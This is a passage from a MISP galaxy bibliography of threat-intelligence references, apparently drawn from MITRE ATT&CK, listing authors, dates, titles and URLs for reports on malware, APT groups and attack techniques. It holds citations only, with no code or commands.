Table 13797. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

Citizen Lab Group5

Scott-Railton, J., et al. (2016, August 2). Group5: Syria and the Iranian Connection. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Citizen Lab Group5"

Table 13798. Table References

Links

https://citizenlab.ca/2016/08/group5-syria/

Group-IB Threat Intelligence Tweet October 9 2023

GroupIB_TI. (2023, October 9). Group-IB Threat Intelligence Tweet October 9 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Group-IB Threat Intelligence Tweet October 9 2023"

Table 13799. Table References

Links

https://twitter.com/GroupIB_TI/status/1711234869060358562

TechNet Group Policy Basics

srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="TechNet Group Policy Basics"

Table 13800. Table References

Links

https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/

Microsoft GPP 2016

Microsoft. (2016, August 31). Group Policy Preferences. Retrieved March 9, 2020.

The tag is: misp-galaxy:references="Microsoft GPP 2016"

Table 13801. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)

Venafi SSH Key Abuse

Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Venafi SSH Key Abuse"

Table 13802. Table References

Links

https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities

Wikibooks Grsecurity

Wikibooks. (2018, August 19). Grsecurity/The RBAC System. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Wikibooks Grsecurity"

Table 13803. Table References

Links

https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System

TrueSec Gsecdump

TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="TrueSec Gsecdump"

Table 13804. Table References

Links

https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5

GTFOBins Suid

Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.

The tag is: misp-galaxy:references="GTFOBins Suid"

Table 13805. Table References

Links

https://gtfobins.github.io/+suid

GTFObins at

Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="GTFObins at"

Table 13806. Table References

Links

https://gtfobins.github.io/gtfobins/at/

Fortinet Moses Staff February 15 2022

Rotem Sde-Or. (2022, February 15). Guard Your Drive from DriveGuard: Moses Staff Campaigns Against Israeli Organizations Span Several Months. Retrieved October 23, 2023.

The tag is: misp-galaxy:references="Fortinet Moses Staff February 15 2022"

Table 13807. Table References

Links

https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard

Unit 42 NETWIRE April 2020

Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Unit 42 NETWIRE April 2020"

Table 13808. Table References

Links

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

Cisco H1N1 Part 1

Reynolds, J.. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Cisco H1N1 Part 1"

Table 13809. Table References

Links

http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

Cisco H1N1 Part 2

Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Cisco H1N1 Part 2"

Table 13810. Table References

Links

http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities-part-2

Wired Magecart S3 Buckets, 2019

Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Wired Magecart S3 Buckets, 2019"

Table 13811. Table References

Links

https://www.wired.com/story/magecart-amazon-cloud-hacks/

Wired Uber Breach

Andy Greenberg. (2017, January 21). Hack Brief: Uber Paid Off Hackers to Hide a 57-Million User Data Breach. Retrieved May 14, 2021.

The tag is: misp-galaxy:references="Wired Uber Breach"

Table 13812. Table References

Links

https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/

Trendmicro NPM Compromise

Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="Trendmicro NPM Compromise"

Table 13813. Table References

Links

https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Data Destruction - Threat Post

Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code Spaces Out of Business. Retrieved December 15, 2020.

The tag is: misp-galaxy:references="Data Destruction - Threat Post"

Table 13814. Table References

Links

https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/

Salesforce zero-day in facebook phishing attack

Bill Toulas. (2023, August 2). Hackers exploited Salesforce zero-day in Facebook phishing attack. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Salesforce zero-day in facebook phishing attack"

Table 13815. Table References

Links

https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/

Fortune Dragonfly 2.0 Sept 2017

Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.

The tag is: misp-galaxy:references="Fortune Dragonfly 2.0 Sept 2017"

Table 13816. Table References

Links

http://fortune.com/2017/09/06/hack-energy-grid-symantec/

Huntress API Hash

Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="Huntress API Hash"

Table 13817. Table References

Links

https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection

BleepingComputer Agent Tesla steal wifi passwords

Sergiu Gatlan. (2020, April 16). Hackers steal WiFi passwords using upgraded Agent Tesla malware. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="BleepingComputer Agent Tesla steal wifi passwords"

Table 13818. Table References

Links

https://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent-tesla-malware/

PCMag FakeLogin

Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="PCMag FakeLogin"

Table 13819. Table References

Links

https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages

Krebs-Bazaar

Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.

The tag is: misp-galaxy:references="Krebs-Bazaar"

Table 13820. Table References

Links

https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

BleepingComputer Molerats Dec 2020

Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020.

The tag is: misp-galaxy:references="BleepingComputer Molerats Dec 2020"

Table 13821. Table References

Links

https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/

Microsoft Hacking Team Breach

Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Microsoft Hacking Team Breach"

Table 13822. Table References

Links

https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/

Intel HackingTeam UEFI Rootkit

Intel Security. (2005, July 16). HackingTeam’s UEFI Rootkit Details. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="Intel HackingTeam UEFI Rootkit"

Table 13823. Table References

Links

http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

TrendMicro Hacking Team UEFI

Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.

The tag is: misp-galaxy:references="TrendMicro Hacking Team UEFI"

Table 13824. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/

TempertonDarkHotel

Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="TempertonDarkHotel"

Table 13825. Table References

Links

https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage

FireEye Hacking FIN4 Video Dec 2014

Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.

The tag is: misp-galaxy:references="FireEye Hacking FIN4 Video Dec 2014"

Table 13826. Table References

Links

https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html

FireEye Hacking FIN4 Dec 2014

Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="FireEye Hacking FIN4 Dec 2014"

Table 13827. Table References

Links

https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

Malwarebytes OSINT Leaky Buckets - Hioureas

Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="Malwarebytes OSINT Leaky Buckets - Hioureas"

Table 13828. Table References

Links

https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/

Microsoft HAFNIUM March 2020

MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.

The tag is: misp-galaxy:references="Microsoft HAFNIUM March 2020"

Table 13829. Table References

Links

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

haking9 libpcap network sniffing

Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.

The tag is: misp-galaxy:references="haking9 libpcap network sniffing"

Table 13830. Table References

Links

http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf

FireEye APT29

FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.

The tag is: misp-galaxy:references="FireEye APT29"

Table 13831. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

FireEye Hancitor

Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="FireEye Hancitor"

Table 13832. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html

NCC Group Fivehands June 2021

Matthews, M. and Backhouse, W. (2021, June 15). Handy guide to a new Fivehands ransomware variant. Retrieved June 24, 2021.

The tag is: misp-galaxy:references="NCC Group Fivehands June 2021"

Table 13833. Table References

Links

https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/

Apple Developer Doco Hardened Runtime

Apple Inc.. (2021, January 1). Hardened Runtime: Manage security protections and resource access for your macOS apps.. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Apple Developer Doco Hardened Runtime"

Table 13834. Table References

Links

https://developer.apple.com/documentation/security/hardened_runtime

FireEye APT34 July 2019

Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.

The tag is: misp-galaxy:references="FireEye APT34 July 2019"

Table 13835. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

GitHub Hashjacking

Dunning, J. (2016, August 1). Hashjacking. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="GitHub Hashjacking"

Table 13836. Table References

Links

https://github.com/hob0/hashjacking

FireEye HawkEye Malware July 2017

Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="FireEye HawkEye Malware July 2017"

Table 13837. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

Specter Ops - Cloud Credential Storage

Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Specter Ops - Cloud Credential Storage"

Table 13838. Table References

Links

https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

Securelist Dtrack2

KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Securelist Dtrack2"

Table 13839. Table References

Links

https://securelist.com/my-name-is-dtrack/93338/

Securelist Dtrack

Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="Securelist Dtrack"

Table 13840. Table References

Links

https://securelist.com/my-name-is-dtrack/93338/

Help eliminate unquoted path

Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.

The tag is: misp-galaxy:references="Help eliminate unquoted path"

Table 13841. Table References

Links

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

Baggett 2012

Baggett, M. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Baggett 2012"

Table 13842. Table References

Links

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

Default VBS macros Blocking

Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.

The tag is: misp-galaxy:references="Default VBS macros Blocking"

Table 13843. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805

Twitter CMSTP Usage Jan 2018

Carr, N. (2018, January 31). Here is some early bad cmstp.exe…​ Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Twitter CMSTP Usage Jan 2018"

Table 13844. Table References

Links

https://twitter.com/ItsReallyNick/status/958789644165894146

ESET Hermetic Wiper February 2022

ESET. (2022, February 24). HermeticWiper: New data wiping malware hits Ukraine. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="ESET Hermetic Wiper February 2022"

Table 13845. Table References

Links

https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine

SentinelOne Hermetic Wiper February 2022

Guerrero-Saade, J. (2022, February 23). HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="SentinelOne Hermetic Wiper February 2022"

Table 13846. Table References

Links

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack

Dragos Hexane

Dragos. (n.d.). Hexane. Retrieved October 27, 2019.

The tag is: misp-galaxy:references="Dragos Hexane"

Table 13847. Table References

Links

https://dragos.com/resource/hexane/

Sourceforge Heyoka 2022

Sourceforge. (n.d.). Heyoka POC Exfiltration Tool. Retrieved October 11, 2022.

The tag is: misp-galaxy:references="Sourceforge Heyoka 2022"

Table 13848. Table References

Links

https://heyoka.sourceforge.net/

Hh.exe - LOLBAS Project

LOLBAS. (2018, May 25). Hh.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Hh.exe - LOLBAS Project"

Table 13849. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Hh/

CrowdStrike BloodHound April 2018

Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.

The tag is: misp-galaxy:references="CrowdStrike BloodHound April 2018"

Table 13850. Table References

Links

https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/

McAfee Bankshot

Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.

The tag is: misp-galaxy:references="McAfee Bankshot"

Table 13851. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/

Pfammatter - Hidden Inbox Rules

Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Pfammatter - Hidden Inbox Rules"

Table 13852. Table References

Links

https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/

Intezer HiddenWasp Map 2019

Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.

The tag is: misp-galaxy:references="Intezer HiddenWasp Map 2019"

Table 13853. Table References

Links

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

Apple Support Hide a User Account

Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.

The tag is: misp-galaxy:references="Apple Support Hide a User Account"

Table 13854. Table References

Links

https://support.apple.com/en-us/HT203998

Malwarebytes Wow6432Node 2016

Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.

The tag is: misp-galaxy:references="Malwarebytes Wow6432Node 2016"

Table 13855. Table References

Links

https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/

FireEye APT17

FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="FireEye APT17"

Table 13856. Table References

Links

https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

Crowdstrike Hiding in Plain Sight 2018

Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.

The tag is: misp-galaxy:references="Crowdstrike Hiding in Plain Sight 2018"

Table 13857. Table References

Links

https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/

Hiding Malicious Code with Module Stomping

Aliz Hammond. (2019, August 15). Hiding Malicious Code with "Module Stomping": Part 1. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Hiding Malicious Code with Module Stomping"

Table 13858. Table References

Links

https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/

SpectorOps Hiding Reg Jul 2017

Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="SpectorOps Hiding Reg Jul 2017"

Table 13859. Table References

Links

https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353

FireEye SUNBURST Backdoor December 2020

FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.

The tag is: misp-galaxy:references="FireEye SUNBURST Backdoor December 2020"

Table 13860. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

Redirectors_Domain_Fronting

Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.

The tag is: misp-galaxy:references="Redirectors_Domain_Fronting"

Table 13861. Table References

Links

https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/

Synack Secure Kernel Extension Broken

Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Synack Secure Kernel Extension Broken"

Table 13862. Table References

Links

https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/

Unit 42 Hildegard Malware

Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.

The tag is: misp-galaxy:references="Unit 42 Hildegard Malware"

Table 13863. Table References

Links

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

Drakonia HInvoke

drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="Drakonia HInvoke"

Table 13864. Table References

Links

https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03

microsoft_services_registry_tree

Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021.

The tag is: misp-galaxy:references="microsoft_services_registry_tree"

Table 13865. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

Microsoft CurrentControlSet Services

Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020.

The tag is: misp-galaxy:references="Microsoft CurrentControlSet Services"

Table 13866. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

Accenture Hogfish April 2018

Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Accenture Hogfish April 2018"

Table 13867. Table References

Links

http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf

Proofpoint Router Malvertising

Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="Proofpoint Router Malvertising"

Table 13868. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices

Trustwave Honeypot SkidMap 2023

Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="Trustwave Honeypot SkidMap 2023"

Table 13869. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/

Microsoft Hook Overview

Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Microsoft Hook Overview"

Table 13870. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx

SpectorOps Host-Based Jul 2017

Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="SpectorOps Host-Based Jul 2017"

Table 13871. Table References

Links

https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea

Crowdstrike AWS User Federation Persistence

Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="Crowdstrike AWS User Federation Persistence"

Table 13872. Table References

Links

https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/

Andy Greenberg June 2017

Andy Greenberg. (2017, June 28). How an Entire Nation Became Russia’s Test Lab for Cyberwar. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Andy Greenberg June 2017"

Table 13873. Table References

Links

https://www.wired.com/story/russian-hackers-attack-ukraine/

Symantec Digital Certificates

Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="Symantec Digital Certificates"

Table 13874. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

ADSecurity Silver Tickets

Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.

The tag is: misp-galaxy:references="ADSecurity Silver Tickets"

Table 13875. Table References

Links

https://adsecurity.org/?p=2011

Amazon S3 Security, 2019

Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Amazon S3 Security, 2019"

Table 13876. Table References

Links

https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/

Microsoft Connection Manager Oct 2009

Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Microsoft Connection Manager Oct 2009"

Table 13877. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)

dns_changer_trojans

Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.

The tag is: misp-galaxy:references="dns_changer_trojans"

Table 13878. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats

Entrust Enable CAPI2 Aug 2017

Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Entrust Enable CAPI2 Aug 2017"

Table 13879. Table References

Links

http://www.entrust.net/knowledge-base/technote.cfm?tn=8165

Apple Culprit Access

rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022.

The tag is: misp-galaxy:references="Apple Culprit Access"

Table 13880. Table References

Links

https://discussions.apple.com/thread/3991574

DOJ FIN7 Aug 2018

Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.

The tag is: misp-galaxy:references="DOJ FIN7 Aug 2018"

Table 13881. Table References

Links

https://www.justice.gov/opa/press-release/file/1084361/download

Charles McLellan March 2016

Charles McLellan. (2016, March 4). How hackers attacked Ukraine’s power grid: Implications for Industrial IoT security. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Charles McLellan March 2016"

Table 13882. Table References

Links

https://www.zdnet.com/article/how-hackers-attacked-ukraines-power-grid-implications-for-industrial-iot-security/

Cyware Social Media

Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Cyware Social Media"

Table 13883. Table References

Links

https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e

malware_hides_service

Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.

The tag is: misp-galaxy:references="malware_hides_service"

Table 13884. Table References

Links

https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/

S1 macOs Persistence

Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.

The tag is: misp-galaxy:references="S1 macOs Persistence"

Table 13885. Table References

Links

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

sentinelone macos persist Jun 2019

Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="sentinelone macos persist Jun 2019"

Table 13886. Table References

Links

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Kaspersky Autofill

Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Kaspersky Autofill"

Table 13887. Table References

Links

https://www.kaspersky.com/blog/browser-data-theft/27871/

TheEclecticLightCompany apple notarization

How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="TheEclecticLightCompany apple notarization"

Table 13888. Table References

Links

https://eclecticlight.co/2020/08/28/how-notarization-works/

SentinelOne AppleScript

Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.

The tag is: misp-galaxy:references="SentinelOne AppleScript"

Table 13889. Table References

Links

https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/

SecureWorld - How Secure Is Your Slack Channel - Dec 2021

Drew Todd. (2021, December 28). How Secure Is Your Slack Channel?. Retrieved May 31, 2022.

The tag is: misp-galaxy:references="SecureWorld - How Secure Is Your Slack Channel - Dec 2021"

Table 13890. Table References

Links

https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel#::text=Electronic%20Arts%20hacked%20through%20Slack%20channel&text=In%20total%2C%20the%20hackers%20claim

Windows OS Hub RDP

Windows OS Hub. (2021, November 10). How to Allow Multiple RDP Sessions in Windows 10 and 11?. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="Windows OS Hub RDP"

Table 13891. Table References

Links

http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/

Xpn Argue Like Cobalt 2019

Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Xpn Argue Like Cobalt 2019"

Table 13892. Table References

Links

https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/

Seqrite DoubleExtension

Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021.

The tag is: misp-galaxy:references="Seqrite DoubleExtension"

Table 13893. Table References

Links

https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/

BOA Telephone Scams

Bank of America. (n.d.). How to avoid telephone scams. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="BOA Telephone Scams"

Table 13894. Table References

Links

https://business.bofa.com/en-us/content/what-is-vishing.html

bypass_webproxy_filtering

Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.

The tag is: misp-galaxy:references="bypass_webproxy_filtering"

Table 13895. Table References

Links

https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/

Systemd Remote Control

